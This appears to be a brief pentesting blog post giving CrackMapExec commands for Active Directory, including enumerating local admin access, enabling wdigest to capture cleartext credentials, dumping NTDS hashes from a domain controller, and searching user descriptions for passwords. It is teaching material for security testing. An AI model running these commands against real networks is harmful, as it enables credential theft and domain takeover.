Hey friends, today we’re covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

# Enumerate where your user has local admin rights:
cme smb x.x.x.x/24 -u user -p password

# Set wdigest flag:
cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable

# Dump AD creds:
cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled

# Clean up AD dump output:
cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort

# Check ms-ds-machineaccountquota:
cme ldap x.x.x.x -u user -p password -M maq

# Check for Active Directory Certificate Services:
cme ldap x.x.x.x -u user -p password -M adcs

# Pull all AD user descriptions:
cme ldap x.x.x.x -u user -p password -M get-desc-users

# Pull all AD user descriptions down to a file and search for users with "pass" in description:
cme ldap x.x.x.x -u user -p password -M user-desc

# CrackMapExec database (CME)

## Clear database
sudo rm -r ~/.cme

## Handy commands inside the cmedb prompt:
export shares detailed shares.csv
export creds detailed creds.txt

Written by: Brian Johnson

Share on socials: